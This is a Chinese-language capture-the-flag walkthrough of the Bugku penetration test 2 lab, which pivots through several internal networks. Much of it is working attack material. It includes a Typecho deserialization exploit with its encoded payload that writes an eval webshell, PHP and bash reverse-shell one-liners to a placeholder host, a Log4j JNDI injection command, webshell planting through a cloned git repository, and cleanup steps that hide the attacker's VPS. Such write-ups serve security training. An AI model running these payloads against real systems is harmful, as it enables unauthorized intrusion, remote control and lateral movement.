bugku渗透测试2 WP

bugku渗透测试1 WP有详细的frp,proxifier配置
https://www.cnblogs.com/thebeastofwar/p/17744965.html
注意这次因为有三次frp代理,所以注意代理命名和端口号要不同(frpc1.ini,frpc2.ini,frpc3.ini样例)



先fscan一段扫,无果

然后nmap扫全端口,无果

之后回到web端查看指纹,发现希望

发现这个有nday漏洞
exp.php

<?php
class Typecho_Feed 
{ 
	const RSS1 = 'RSS 1.0'; 
	const RSS2 = 'RSS 2.0'; 
	const ATOM1 = 'ATOM 1.0'; 
	const DATE_RFC822 = 'r'; 
	const DATE_W3CDTF = 'c'; 
	const EOL = "\n"; 
	private $_type; 
	private $_items; 
	
	public function __construct(){
    $this->_type = $this::RSS2; 
    $this->_items[0] = array( 
    	'title' => '1', 
    	'link' => '1', 
    	'date' => 1508895132, 
    	'category' => array(new Typecho_Request()), 
    	'author' => new Typecho_Request(), 
    	); 
  	} 
} 
class Typecho_Request 
{ 
	private $_params = array(); 
	private $_filter = array(); 
	public function __construct(){ 
	$this->_params['screenName'] = 'echo "<?php phpinfo();@eval(\$_POST[1]);?>" > shell.php';    
	$this->_filter[0] = 'system'; 
	} 
} 
 
$exp = array( 
	'adapter' => new Typecho_Feed(), 
	'prefix' => 'typecho_' 
); 
 
echo base64_encode(serialize($exp));
?>

之后传参

get:http://47.102.44.129/install.php?finish=a
post:
__typecho_config=YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6Mjp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo3OiJSU1MgMi4wIjtzOjIwOiIAVHlwZWNob19GZWVkAF9pdGVtcyI7YToxOntpOjA7YTo1OntzOjU6InRpdGxlIjtzOjE6IjEiO3M6NDoibGluayI7czoxOiIxIjtzOjQ6ImRhdGUiO2k6MTUwODg5NTEzMjtzOjg6ImNhdGVnb3J5IjthOjE6e2k6MDtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjU1OiJlY2hvICI8P3BocCBwaHBpbmZvKCk7QGV2YWwoXCRfUE9TVFsxXSk7Pz4iID4gc2hlbGwucGhwIjt9czoyNDoiAFR5cGVjaG9fUmVxdWVzdABfZmlsdGVyIjthOjE6e2k6MDtzOjY6InN5c3RlbSI7fX19czo2OiJhdXRob3IiO086MTU6IlR5cGVjaG9fUmVxdWVzdCI6Mjp7czoyNDoiAFR5cGVjaG9fUmVxdWVzdABfcGFyYW1zIjthOjE6e3M6MTA6InNjcmVlbk5hbWUiO3M6NTU6ImVjaG8gIjw/cGhwIHBocGluZm8oKTtAZXZhbChcJF9QT1NUWzFdKTs/PiIgPiBzaGVsbC5waHAiO31zOjI0OiIAVHlwZWNob19SZXF1ZXN0AF9maWx0ZXIiO2E6MTp7aTowO3M6Njoic3lzdGVtIjt9fX19fXM6NjoicHJlZml4IjtzOjg6InR5cGVjaG9fIjt9

蚁剑连接

flag1
在根目录下读到flag

没有wget命令
php反弹shell
如果php -r的方法不行的话

php -r '$sock=fsockopen("xxx",6666);system("/bin/bash -i <&4 >&4 2>&4");'

可以把

<?php $sock=fsockopen("xxx",6666);exec("/bin/sh -i <&3 >&3 2>&3");?>

写到一个文件里,然后php x.php

提高shell交互性

python3 -c 'import pty; pty.spawn("/bin/bash")'

flag2
读取到config.inc.php配置文件

生成哥斯拉的shell



利用哥斯拉上传fscan,查看内网网段,扫描

192.168.0.2:3306 open
192.168.0.2:80 open
192.168.0.1:80 open
192.168.0.3:80 open
192.168.0.1:22 open
[*] alive ports len is: 5
start vulscan
[*] WebTitle: http://192.168.0.1        code:200 len:3392   title:Harry's Blog
[*] WebTitle: http://192.168.0.2        code:200 len:3392   title:Harry's Blog
[*] WebTitle: http://192.168.0.3        code:200 len:4789   title:Bugku后台管理系统
[+] mysql:192.168.0.2:3306:root 

socks5代理
访问http://192.168.0.3/

目录扫描发现source.zip源码泄露(正规解法应该是burp发现返回包有source.zip字段)
进行简单的代码审计
主要就两个文件
Log4j2CtfApplication.java

package com.example.log4j2ctf;

import org.springframework.boot.SpringApplication;
import org.springframework.boot.autoconfigure.SpringBootApplication;

@SpringBootApplication
public class Log4j2CtfApplication {

    public static void main(String[] args) {
        SpringApplication.run(Log4j2CtfApplication.class, args);
    }

}

DamnVulnerableLog4j.java

package com.example.log4j2ctf.controller;

import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.bind.annotation.RestController;

import javax.servlet.http.HttpServletResponse;

@RestController
public class DamnVulnerableLog4j {

    private final Logger logger = LoggerFactory.getLogger(this.getClass());
    private int count = 0;

    @PostMapping("/login")
    public String login(String user, String pwd, HttpServletResponse response) {
        response.addHeader("Source", "/source.zip");
        /*
         *
         *
         */
        logger.info("用户登录失败，用户名不存在：" + user);

        return "用户名或密码错误，次数 " + (count++);
    }

}

现在我们需要考虑三个问题:
1.利用哪一个漏洞(log4j,根据文件的名字得出来的,也可以根据文件中的log日志回想起2021的log4j漏洞)
2.知道了是log4j漏洞,利用点在哪里(在输入用户名的地方,因为代码中有logger.info("用户登录失败，用户名不存在：" + user);,可以拼接log4j的ldap,rmi等相关注入)
3.知道了利用点在哪里,log4j有很多个payload,该用哪一个(springboot的那个,因为pom.xml中有springboot的相关配置,这个应该利用springboot的相关框架,猜测)
然后将JNDI-Injection-Exploit-1.0.jar上传到vps上

bash -i >& /dev/tcp/xxx/6666 0>&1
bash -c {echo,xxx}|{base64,-d}|{bash,-i}
java -jar JNDI-Injection-Exploit-1.0.jar -C "bash -c {echo,xxx}|{base64,-d}|{bash,-i}" -A "xxx"

选择sprintboot
payload:${jndi:rmi://xxx:xxx/xxx}
将payload放在用户名处

然后nc监听
接受到反弹的shell
一上来就是root

flag4
cat /flag
读取到/start.sh
flag5
发现/root/flag也有flag
flag3
全局搜索flag
在环境变量中发现三个flag

ip address发现还有别的网卡

利用wget远程下载fscan,frpc,frpc.ini
扫描192.168.1.0-255

192.168.1.3:80 open
192.168.1.1:80 open
192.168.1.2:80 open
192.168.1.1:22 open
[*] alive ports len is: 4
start vulscan
[*] WebTitle: http://192.168.1.1        code:200 len:3392   title:Harry's Blog
[*] WebTitle: http://192.168.1.2        code:200 len:4789   title:Bugku后台管理系统
[*] WebTitle: http://192.168.1.3        code:200 len:524    title:乙公司Git仓库
已完成 3/4 [-] ssh 192.168.1.1:22 root P@ssw0rd! ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 3/4 [-] ssh 192.168.1.1:22 root Aa123123 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 3/4 [-] ssh 192.168.1.1:22 admin admin123 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 3/4 [-] ssh 192.168.1.1:22 admin Aa1234 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 4/4
[*] 扫描结束,耗时: 4m43.657692575s

http://192.168.1.3/

填入https://github.com/bugku/BWVS.git,在点进去的时候找到了flag



flag6

flag7
之后想getshell
猜测输入仓库的话服务器会直接克隆到本地,要是仓库里面有一个webshell的话,会不会直接getshell了
自己创建一个新仓库,配置ssh密钥,关掉keep my email address private,然后先克隆到本地

git clone xxx
git add .
git commit -m "xxx"
git push

自己仓库地址:https://github.com/TheBeastofwar/webshell-repository
getshell后读取到源码

<html>
 <head>
  <meta charset="utf-8">
  <title>乙公司Git仓库</title>
 </head>
 <body>
    <p>乙公司Git仓库</p>
    <form method="post">
        <label for="repourl">Repository’s clone URL</label><br>
        <input id="repourl" type="input" name="repourl" placeholder="https://github.com/bugku/BWVS.git" style="width: 400px;height: 30px;margin-bottom: 10px;margin-top: 10px;"><br/>
        <input type="submit" value="Submit" />
    </form>
    <p>注意:可以使用自己的服务器。</p>
<?php 
    if (isset($_REQUEST['repourl']) && !empty($_REQUEST['repourl'])) {
        $repourl = escapeshellarg($_REQUEST['repourl']);
        @chdir("/var/www/html/repos/");
        shell_exec("git clone --recursive $repourl");
        echo 'See your project at: <a href="/repos">Repos</a>';
    }
?>
 </body>
</html>

查看网段

上传哥斯拉的shell.phtml
然后利用哥斯拉上传fscan,frpc.frpc.ini
fscan扫描

(icmp) Target 10.10.0.3       is alive
(icmp) Target 10.10.0.2       is alive
(icmp) Target 10.10.0.1       is alive
[*] Icmp alive hosts len is: 3
10.10.0.1:80 open
10.10.0.2:80 open
10.10.0.1:22 open
10.10.0.3:21 open
[*] alive ports len is: 4
start vulscan
[*] WebTitle: http://10.10.0.2          code:200 len:524    title:乙公司Git仓库
[*] WebTitle: http://10.10.0.1          code:200 len:3368   title:Harry's Blog
已完成 2/4 [-] ssh 10.10.0.1:22 root qwe123 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain

开放了21端口
再看一下提示

猜测是ftp服务的用户名和密码 guest/guest
配置proxychains

proxychains ftp 10.10.0.3

flag8
get flag

flag9
cd /
get flag


后续处理
关掉frpc,删掉frpc.ini(里面暴露了自己vps的ip地址)

ps -aux | grep frp > 1.txt
cat 1.txt
kill -9 xxx

遇坑反思:
在反弹shell的中,如果遇到卡的时间长的话按ctrl+c想退出的话会直接退出shell